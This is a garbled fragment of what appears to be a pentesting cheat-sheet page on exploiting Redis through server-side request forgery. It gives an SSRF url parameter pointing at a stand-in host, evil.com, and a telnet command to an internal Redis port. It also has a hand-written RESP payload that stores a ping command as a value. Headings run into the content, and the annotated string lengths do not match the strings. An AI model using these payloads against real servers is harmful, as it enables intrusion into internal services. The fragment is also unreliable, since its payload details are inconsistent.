Redis SSRF
Investigation
url=http://evil.com/Exploitation
Automation
Payload Manually
telnet 10.0.0.1 6379
*3 # 3 arguments ("SET", "user", "")
$3 # 3 length of the string "SET"
SET
$4 # 4 length of the string "user" key
user
$18 # 18 length of the string ""
ping+-c+1+10.0.0.2References
Last updated